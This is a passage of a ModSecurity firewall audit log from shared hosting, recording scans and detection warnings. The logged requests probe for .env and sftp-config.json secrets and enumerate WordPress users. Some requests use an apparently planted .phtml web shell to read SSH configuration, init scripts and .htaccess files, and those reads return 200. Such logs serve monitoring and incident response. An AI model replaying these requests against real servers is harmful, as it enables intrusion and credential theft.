X-Powered-By: PHP/8.2.28 X-Robots-Tag: noindex Link: <https://www.csquaretech.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --2b25540a-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.csquaretech.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.csquaretech.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.csquaretech.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE5Rmy7IKUqG672kqSysTAAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/csquaretech.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749963163292251 710545 (- - -) Stopwatch2: 1749963163292251 710545; combined=2309, p1=452, p2=1727, p3=0, p4=0, p5=130, sr=138, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2b25540a-Z-- --9f30b216-A-- [15/Jun/2025:10:41:48.875317 +0530] aE5WFBmnVjDRYaxdCWSrYwAAAAY 103.156.92.21 39508 127.0.0.1 7080 --9f30b216-B-- GET /.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 103.156.92.21 Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept-Encoding: gzip, deflate Accept: */* --9f30b216-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --9f30b216-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.env"] [unique_id "aE5WFBmnVjDRYaxdCWSrYwAAAAY"] Stopwatch: 1749964308872565 2798 (- - -) Stopwatch2: 1749964308872565 2798; combined=1649, p1=400, p2=1163, p3=16, p4=22, p5=47, sr=113, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9f30b216-Z-- --95e56a2f-A-- [15/Jun/2025:10:42:43.829206 +0530] aE5WSuGp91NCs5RsuUF5ewAAAAE 13.201.31.180 52696 127.0.0.1 7081 --95e56a2f-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: www.retaxis.com X-Real-IP: 13.201.31.180 X-Accel-Internal: /internal-nginx-static-location Connection: close Cookie: _sfs_id=6b4686b2461142eb457d802f5f3a30cd1749964359 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 --95e56a2f-F-- HTTP/1.1 401 Unauthorized X-Powered-By: PHP/8.2.28 X-Robots-Tag: noindex Link: <https://www.retaxis.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Vary: Origin,Accept-Encoding Connection: close Content-Type: application/json; charset=UTF-8 --95e56a2f-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.retaxis.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.retaxis.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.retaxis.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE5WSuGp91NCs5RsuUF5ewAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/retaxis.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749964362707546 1121742 (- - -) Stopwatch2: 1749964362707546 1121742; combined=2106, p1=357, p2=1658, p3=0, p4=0, p5=91, sr=100, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --95e56a2f-Z-- --3fb0e83f-A-- [15/Jun/2025:10:42:44.497184 +0530] aE5WS58QGFAH93Auzk53FgAAAAI 13.201.31.180 52706 127.0.0.1 7081 --3fb0e83f-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: www.retaxis.com X-Real-IP: 13.201.31.180 X-Accel-Internal: /internal-nginx-static-location Connection: close Cookie: _sfs_id=3cac5210001d2f9d7b7ccce8bd165c3b1749964360 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 --3fb0e83f-F-- HTTP/1.1 401 Unauthorized X-Powered-By: PHP/8.2.28 X-Robots-Tag: noindex Link: <https://www.retaxis.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Vary: Origin,Accept-Encoding Connection: close Content-Type: application/json; charset=UTF-8 --3fb0e83f-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.retaxis.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.retaxis.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.retaxis.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE5WS58QGFAH93Auzk53FgAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/retaxis.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749964363425910 1071344 (- - -) Stopwatch2: 1749964363425910 1071344; combined=1895, p1=324, p2=1455, p3=0, p4=0, p5=116, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3fb0e83f-Z-- --7ceede1f-A-- [15/Jun/2025:10:53:44.595725 +0530] aE5Y34VMjG_Zv7b9NpIGNwAAAAA 44.249.149.31 57886 127.0.0.1 7081 --7ceede1f-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: www.rooferscombine.com X-Real-IP: 44.249.149.31 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 --7ceede1f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://www.rooferscombine.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type X-WP-Total: 1 X-WP-TotalPages: 1 Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --7ceede1f-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.rooferscombine.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.rooferscombine.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.rooferscombine.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE5Y34VMjG_Zv7b9NpIGNwAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/rooferscombine.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749965023758342 837452 (- - -) Stopwatch2: 1749965023758342 837452; combined=1889, p1=313, p2=1512, p3=0, p4=0, p5=64, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7ceede1f-Z-- --e9209a71-A-- [15/Jun/2025:10:54:06.348285 +0530] aE5Y9fzELXyWJtk-RXdBZgAAAAQ 82.102.18.190 60814 127.0.0.1 7081 --e9209a71-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: www.csquaretech.com X-Real-IP: 82.102.18.190 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 --e9209a71-F-- HTTP/1.1 401 Unauthorized X-Powered-By: PHP/8.2.28 X-Robots-Tag: noindex Link: <https://www.csquaretech.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --e9209a71-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.csquaretech.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.csquaretech.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.csquaretech.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE5Y9fzELXyWJtk-RXdBZgAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/csquaretech.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749965045388711 959649 (- - -) Stopwatch2: 1749965045388711 959649; combined=1741, p1=346, p2=1295, p3=0, p4=0, p5=99, sr=101, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e9209a71-Z-- --3a01db1b-A-- [15/Jun/2025:11:02:24.668009 +0530] aE5a6C7IKUqG672kqSyv1QAAAAg 3.221.50.71 36070 127.0.0.1 7081 --3a01db1b-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/ssh&viewfile=//etc/ssh/sshd_config.ucf-dist HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 3.221.50.71 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --3a01db1b-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4398 Connection: close Content-Type: text/html; charset=UTF-8 --3a01db1b-H-- Message: Warning. Matched phrase "etc/ssh/sshd_config" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/ssh/sshd_config found within ARGS:viewfile: /etc/ssh/sshd_config.ucf-dist"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/ssh/sshd_config" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/ssh/sshd_config found within ARGS:viewfile: /etc/ssh/sshd_config.ucf-dist"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE5a6C7IKUqG672kqSyv1QAAAAg"] Apache-Handler: application/x-httpd-php Stopwatch: 1749965544663482 4579 (- - -) Stopwatch2: 1749965544663482 4579; combined=2334, p1=458, p2=1723, p3=37, p4=37, p5=79, sr=199, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3a01db1b-Z-- --f6d23320-A-- [15/Jun/2025:11:03:19.780141 +0530] aE5bHy7IKUqG672kqSyv7AAAAAg 52.204.81.148 51684 127.0.0.1 7081 --f6d23320-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/init.d&viewfile=//etc/init.d/screen-cleanup HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 52.204.81.148 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --f6d23320-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3533 Connection: close Content-Type: text/html; charset=UTF-8 --f6d23320-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /etc/init.d/screen-cleanup"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE5bHy7IKUqG672kqSyv7AAAAAg"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /etc/init.d/screen-cleanup"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE5bHy7IKUqG672kqSyv7AAAAAg"] Apache-Handler: application/x-httpd-php Stopwatch: 1749965599775796 4397 (- - -) Stopwatch2: 1749965599775796 4397; combined=2304, p1=423, p2=1736, p3=33, p4=33, p5=79, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f6d23320-Z-- --c962b841-A-- [15/Jun/2025:11:06:53.731280 +0530] aE5b9fzELXyWJtk-RXdCcgAAAAQ 35.181.43.144 58138 127.0.0.1 7081 --c962b841-B-- GET /sftp-config.json HTTP/1.0 Host: delsig.cstechns.com X-Real-IP: 35.181.43.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept-Encoding: gzip, deflate Accept: */* --c962b841-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://delsig.cstechns.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --c962b841-H-- Message: Warning. Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "delsig.cstechns.com"] [uri "/sftp-config.json"] [unique_id "aE5b9fzELXyWJtk-RXdCcgAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/delsig.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749965813417016 314328 (- - -) Stopwatch2: 1749965813417016 314328; combined=1661, p1=363, p2=1184, p3=0, p4=0, p5=114, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c962b841-Z-- --d2aadd7f-A-- [15/Jun/2025:11:12:34.876875 +0530] aE5dSvzELXyWJtk-RXdC9gAAAAQ 216.73.216.83 34880 127.0.0.1 7081 --d2aadd7f-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2Fvar%2Fwww%2Fvhosts%2Fsarainternational.ae%2Fhttpdocs%2Fadmin%2Fimages%2Fsubproduct&viewfile=%2Fvar%2Fwww%2Fvhosts%2Fsarainternational.ae%2Fhttpdocs%2Fadmin%2Fimages%2Fsubproduct%2F.htaccess HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --d2aadd7f-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3036 Connection: close Content-Type: text/html; charset=UTF-8 --d2aadd7f-H-- Message: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c%20bipas.phtml"] [unique_id "aE5dSvzELXyWJtk-RXdC9gAAAAQ"] Apache-Handler: application/x-httpd-php Stopwatch: 1749966154873760 3178 (- - -) Stopwatch2: 1749966154873760 3178; combined=1332, p1=282, p2=965, p3=29, p4=20, p5=36, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d2aadd7f-Z-- --a3ea1355-A-- [15/Jun/2025:11:13:19.272218 +0530] aE5ddvzELXyWJtk-RXdDCwAAAAQ 185.177.72.104 59860 127.0.0.1 7081 --a3ea1355-B-- GET /.env HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 185.177.72.104 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --a3ea1355-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --a3ea1355-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/.env"] [unique_id "aE5ddvzELXyWJtk-RXdDCwAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749966198311342 960946 (- - -) Stopwatch2: 1749966198311342 960946; combined=1658, p1=384, p2=1171, p3=0, p4=0, p5=102, sr=110, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a3ea1355-Z-- --83cecd3f-A-- [15/Jun/2025:11:13:20.582210 +0530] aE5ddw2pbpddt_O7FYy26wAAAAc 185.177.72.104 38394 127.0.0.1 7081 --83cecd3f-B-- GET /app/.env HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 185.177.72.104 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --83cecd3f-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --83cecd3f-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/app/.env"] [unique_id "aE5ddw2pbpddt_O7FYy26wAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749966199609960 972333 (- - -) Stopwatch2: 1749966199609960 972333; combined=1829, p1=347, p2=1368, p3=0, p4=0, p5=113, sr=83, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --83cecd3f-Z-- --e7ae301f-A-- [15/Jun/2025:11:13:21.961455 +0530] aE5dePZLNtGrhJkyGMO8OgAAAAs 185.177.72.104 38436 127.0.0.1 7081 --e7ae301f-B-- GET /.env.bak HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 185.177.72.104 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --e7ae301f-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --e7ae301f-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.dealsdray.com|F|2"] [data ".env.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/.env.bak"] [unique_id "aE5dePZLNtGrhJkyGMO8OgAAAAs"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.dealsdray.com|F|2"] [data ".env.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.dealsdray.com"] [uri "/.env.bak"] [unique_id "aE5dePZLNtGrhJkyGMO8OgAAAAs"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749966200904613 1056901 (- - -) Stopwatch2: 1749966200904613 1056901; combined=1704, p1=347, p2=1235, p3=0, p4=0, p5=121, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: 